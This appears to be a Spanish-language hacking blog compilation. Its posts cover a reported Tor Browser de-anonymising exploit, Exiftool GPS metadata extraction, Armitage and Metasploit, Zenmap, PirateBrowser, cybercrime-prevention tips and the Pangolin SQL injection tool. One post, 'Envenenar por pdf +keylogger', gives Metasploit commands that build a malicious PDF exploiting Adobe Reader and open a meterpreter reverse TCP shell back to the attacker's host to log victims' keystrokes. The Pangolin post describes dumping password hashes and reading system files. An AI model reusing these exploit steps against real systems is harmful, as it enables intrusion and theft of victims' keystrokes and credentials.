El exploit de Tor





Se ha localizado un código malicioso en algunas instalaciones de Tor Browser, el navegador de escritorio del Proyecto Tor, que sería capaz de barrer el anonimato de los usuarios y enviar a un servidor la IP real que estos están utilizando.(se van a entrar por que algunos link ya no sirven )

Según un grupo de expertos en seguridad que han estado analizando el exploit que afectaba a Tor Browser, los datos que se habrían estado recopilando tenían como destino una dirección IP que pertenecería a la NSA.




Tor es uno de los servicios más conocidos que nos permiten navegar por la red de manera anónima; un servicio que mantiene nuestra privacidad y que, para muchos internautas, ha servido de válvula de escape con la que burlar restricciones gubernamentales que han vetado el acceso a determinados servicios. Decir que a Estados Unidos y a otros muchos gobiernos nunca les ha hecho gracia el Proyecto Tor, realmente, no es comentar algo nuevo; sin embargo, los datos que han estado circulando en las últimas horas no son nada tranquilizadores puesto que parece que la red Tor se podría haber visto comprometida por un exploit.

¿La red Tor se ha visto comprometida? ¿No se suponía que era un servicio seguro? Según los datos que circulan por la red y que, por ejemplo, podemos ver en Pastebin; varios usuarios han reportado que en sus instalaciones del navegador web de Tor (Tor browser, una versión modificada de Firefox) han encontrado un código malicioso en Javascript que serviría para eliminar el anonimato del usuario y, por tanto, hacer que éste sea localizable.

Este hallazgo, evidentemente, no casa para nada con el objetivo del proyecto Tor ni con su funcionamiento en estos años; sin embargo, en estos días ha habido una serie de actuaciones que parecen encajar con este malware hallado en el navegador de Tor.


Eric Eoin Marques, el propietario de FreedomWeb, ha sido detenido por el intercambio de archivos con pornografía infantil y va a ser extraditado a Estados Unidos (a petición del FBI). Con la redada y detención de Eoin, su ISP (FreedomWeb) ha quedado fuera de servicio y, precisamente, es el que soporta gran parte de la infraestructura de la red Tor.

FBI, una redada y la red Tor; tres piezas de un rompecabezas en el que el FBI ha alegado que usó técnicas de rastreo durante la desmantelación de esta supuesta red de tráfico de intercambio de contenidos pedófilos que solían usar servicios para navegar de manera anónima por la red. De hecho, aunque aún se está analizando el código hallado, muchas son las voces que comentan que el FBI ha expuesto a muchos usuarios de la red Tor y que, por supuesto, ha puesto entre la espada y la pared a muchos activistas que usan este servicio como única vía con el exterior cuando sus conexiones a Internet están sujetas a restricciones o vigiladas.


FBI, una redada y la red Tor; tres piezas de un rompecabezas en el que el FBI ha alegado que usó técnicas de rastreo durante la desmantelación de esta supuesta red de tráfico de intercambio de contenidos pedófilos que solían usar servicios para navegar de manera anónima por la red. De hecho, aunque aún se está analizando el código hallado, muchas son las voces que comentan que el FBI ha expuesto a muchos usuarios de la red Tor y que, por supuesto, ha puesto entre la espada y la pared a muchos activistas que usan este servicio como única vía con el exterior cuando sus conexiones a Internet están sujetas a restricciones o vigiladas.

¿Está la red Tor comprometida? 


Todavía hay muchas cosas que aclarar sobre este supuesto malware y habrá que esperar a un análisis más profundo para ver si, realmente, las tesis que apuntan a que el FBI ha sido capaz de abrir este agujero en la red Tor son reales y se sustentan con pruebas. De cumplirse esta teoría, sin duda sería un duro golpe para el anonimato en la red y la privacidad.

Fuentes:
http://www.securitynull.net/red-tor-comp...-usuarios/
http://alt1040.com/2013/08/proyecto-tor-comprometido

Exiftool:Localización GPS




Ayer vi un reportaje peruano como se hace la Seguimiento GPS me llamo la atencion que usaron backtrack asi que me puse a investigar y encontre estos videos abajo les dejo el reportaje (recomiendo que lo vean) y el video como se hace , yo tambien lo intente xd.

[ANÁLISIS FORENSE] Extracción Metadatos GPS de Fotografias


Hay que tener en cuenta que no todas las Fotografías tienen datos GPS. La mayoría de las fotos que existen con estos datos, son tomadas desde teléfonos inteligentes y/o cámaras de ultima generación.
Sin embargo, muchas personas que cuentan con estos teléfonos, no tienen conocimiento sobre la opción GPS, por lo que simplemente no saben que esta encendido al momento de tomar una Fotografía.
También resaltar que este método es utilizado para resolver muchos "crímenes" porque realizando un Análisis Forense de una Fotografía, se puede obtener los datos REALES y EXACTOS del momento, fecha, hora, ubicación, nombre de la cámara, fecha de edición si la imagen ha sido editada y todas las demás opciones puestas en ella, llegando así a obtener un resultado real

En BackTrack podemos encontrarla en la siguiente dirección:
Aplicaciones - BackTrack - Forensics - Forensics Analysis Tools - Exiftool.










Armitage-Metasploit




Todas las personas que se dedican al Pen-test o son activos en el campo de la Seguridad Informática tienen conocimiento sobre lo que es Metasploit y el trabajo que realiza, sin embargo el aprendizaje inicial para Metasploit puede ser intimidante para los 'novatos' que estén interesados en realizar pruebas de penetración, pero mayormente no tienen idea por donde empezar.

Armitage es una representación gráfica avanzada de Metasploit Framework, sus principales características son de mapear cada etapa de la Prueba de Penetración, la Recopilación de Información, Explotación y Post Explotacion, con unos pocos clics.

Armitage se encuentra disponible en todas las versiones del BackTrack, y puede ser instalado en cualquier distro de linux sin problema alguno.

Podemos abrirlo desde BackTrack - Exploitation Tools - Network Exploitation Tools - Metasploit Framework - Armitage, o simplemente teclear en la consola armitage.




Conferencia: Metasploit y Armitage :











Mapeo de Redes con Zenmap





Nmap (“mapeador de redes”) es una herramienta de código abierto para exploración de red y auditoría de seguridad. Se diseñó para analizar rápidamente grandes redes, aunque funciona muy bien contra equipos individuales. Nmap utiliza paquetes IP "crudos" («raw»,N. del T.) en formas originales para determinar qué equipos se encuentran disponibles en una red, qué servicios (nombre y versión de la aplicación) ofrecen, qué sistemas operativos (y sus versiones) ejecutan, qué tipo de filtros de paquetes o cortafuegos se están utilizando así como docenas de otras características. Aunque generalmente se utiliza Nmap en auditorías de seguridad, muchos administradores de redes y sistemas lo encuentran útil para realizar tareas rutinarias, como puede ser el inventariado de la red, la planificación de actualización de servicios y la monitorización del tiempo que los equipos o servicios se mantiene activos.

Primero al instalar nmap nos viene con una serie de paquetes herramientas, desarrolladas por el mismo creador de Nmap Fyodor Gordon Lyon las cuales anda reviviendo a algunas tools ya viejas dejadas en el olvido las cuales son:

•Zenmap
•Ndiff
•NPing
•Ncrack
•Ncat

Zenmap:


Zenmap es la interfaz grafica de Nmap, la cual tiene una integracion de lo que es nmap y algunas herramientas que integra en si mismo la verdad acelera el proceso de un pentesting ya que los comandos y demas vienen definidos evitando errores tipográficos.





Descargar Manual:


PirateBrowser .onion es el buscador de Pirate Bay







The Pirate Baylanzó este fin de semana el PirateBrowser, un navegador propio que se salta bloqueos regionales. The Pirate Bay, es uno de los sitios web más bloqueado por órdenes de tribunalesya que se utiliza para compartir y descargar archivos que muchas veces violan los derechos de autor.

El PirateBrowser permite a la gente pasar por alto estas restricciones y en tres días más de 100.000 personas han descargador el navegador a través del enlace directo. De hecho, 5.000 personas compartieron el archivo justo en el momento de su publicación., según reporta Torrentfreak.com



«No pensé que sería descargado a esta velocidad. Supongo que las personas quieren ver los sitios web que sus gobiernos y tribunales les están tratando de esconder», ha dicho Winston de The Pirate Bay a TorrentFreak.

Tal ha sido lo inesperado de la situación que para poder hacer frente a la demanda, The Pirate Bay tuvo que actualizar la conexión para el enlace de descarga. Incluso después de tres días el PirateBrowser recibe unas mil descargas por hora.

El navegador está basado en Firefox 23 y aliado con un cliente Tor. Su objetivo es eludir la censura, pero los equipos Pirate Bay quiere reiterar que no se proporciona anonimato a sus usuarios.



«No es que proporciona el anonimato y no está seguro a ocultar su identidad. PirateBrowser sólo se supone eludir la censura y el bloqueo de sitios web. Si hacemos un navegador totalmente anónimo esto sólo lo va a ralentizar», ha explicado.

Actualmente están trabajando en una aplicación BitTorrent con una potencia especial que permite a los usuarios almacenar y distribuir The Pirate Bay y otros sitios web en sus propios equipos, por lo que es poco probable que terceras partes a lo bloqueen.

Descargar:

http://piratebrowser.com/

5 maneras de ser protegidos de Delitos Cibernéticos




Ciberdelincuencia, también conocida como la delincuencia informática, es un momento de la actividad criminal que ocurre con un ordenador o Internet. Estos delitos pueden ser devastadores y causar un gran daño a la víctima, los tipos de delitos cibernéticos incluyen pornografía infantil, violación de copyright, las estafas de phishing y el fraude o robo de identidad. Aún más graves delitos cibernéticos potenciales incluyen ciber terrorismo y la guerra cibernética, los cuales son cada vez más común tras el aumento del uso mundial de Internet. Para protegerse y evitar convertirse en una víctima de los efectos devastadores de los delitos informáticos, siga las 5 maneras de ser protegidos de Delitos Cibernéticos que figuran a continuación.






1. Tenga cuidado al navegar por la web. Eso significa que si usted hace compras en línea, comprar sólo en sitios web en los que confía sea seguro o han tenido numerosas experiencias. Si usted nunca ha oído hablar o interactuado con un sitio web en particular, asegúrese de hacer su investigación de antemano para determinar su credibilidad. Entrando su información personal en un sitio web sin protección o fraudulenta puede tener consecuencias desastrosas que se pueden evitar fácilmente permanecer alerta.

2. Incluso la mejor protección cibernética puede fallar, por lo que es importante que controle periódicamente sus estados financieros, para asegurarse de que no es una víctima de actividades fraudulentas. Si ve algo sospechoso o ir fuera de lo común en tu cuenta, puede ponerse en contacto con su banco y tomar medidas para garantizar que no vuelva a suceder.

3. Esto puede parecer como un hecho, pero el uso de software anti-virus en su computadora para protegerse contra el delito cibernético. Este software puede ser un fuerte elemento de disuasión ante cualquier estafa o virus. Todo el mundo debería invertir en un buen software, no importa cuán inmune a los virus que usted cree que su equipo está. Software antivirus decente le puede ahorrar un montón de problemas y preocupaciones. No cometa el error de pensar que sólo porque usted tiene un iMac significa que usted es inmune a los virus, mientras que son menos de un objetivo, siguen siendo vulnerables a los delincuentes cibernéticos.


4. Tómese su tiempo para pensar contraseñas seguras para usar para cosas importantes como el registro en su computadora y Smartphone, o ver la información confidencial, como su cuenta bancaria. Esto puede parecer obvio, pero el número de personas que han hackeado su cuenta es una advertencia para que sólo las contraseñas más fuertes pueden resistir entrada. Trate de hacer que su contraseña complicada y comprensible sólo a usted, con al menos ocho caracteres o más. Es posible que su contraseña sea simple y fácil de recordar, pero no elige nada demasiado obvio o puede llegar a arrepentir.

5. Otra forma de protegerse contra la ciberdelincuencia es utilizar diferentes contraseñas para diferentes cuentas. No es una buena idea usar una contraseña común para todo, una vez que un hacker se entera, va a ser una tarea relativamente sencilla para cometer delitos como el robo de identidad. Si recordar demasiadas contraseñas resulta difícil, trate de usar pequeñas variaciones de la misma contraseña.

Envenenar por pdf +keylogger




Las versiones afectadas:
Adobe Reader 9.3 y versiones anteriores para Windows, Macintosh y UNIX
Adobe Acrobat 9.3 y versiones anteriores para Windows y Macintosh

Probado en Windows XP SP3 con Adobe Reader 9.3.0




Descripción:

Este módulo explota una vulnerabilidad de desbordamiento de enteros en Adobe Reader y Adobe Acrobat versiones Professional 8.0 por 8.2 y 9.0 a 9.3.
Hice un video demo como se explota dicho exploit abajo estan los comando que se utilizan en una breve explicación se crea un archivo pdf infectado que afecta las versiones de adobe reader 8,9,9.3 y anteriores para arrancar una sesión de meterpreter y se ve como se utiliza el keylogger que trae el meterpreter.





Descargar video original



Código:
use windows/fileformat/adobe_libtiff
set filename rhinestonehack.pdf
set outputpath /root/Desktop
set payload windows/meterpreter/reverse_tcp
set LHOST (mi ip)
set LPORT 4444

Pangolin penetration Testing SQL Injection





Pangolin es una prueba de penetración, Inyección SQL herramienta de prueba de seguridad de base de datos. Encuentra Inyección SQL vulnerabilities.Its objetivo es detectar y tomar informarle de inyección SQL vulnerabilidades en aplicaciones web. Una vez que se detecta una inyección SQL en el host de destino, el usuario puede elegir entre una variedad de opciones para realizar un extenso back-end de gestión de base de datos de huellas dactilares sistema, recuperar usuarios DBMS sesión y base de datos, los usuarios enumerar, los hashes de contraseñas,
privilegios, bases de datos, volcado tablas específicas enteras o usuario "s DBMS / columnas, ejecutar su propia sentencia de SQL, leer determinados archivos del sistema de archivos y mucho más.

Es una herramienta hecha para Windows:



Descargar: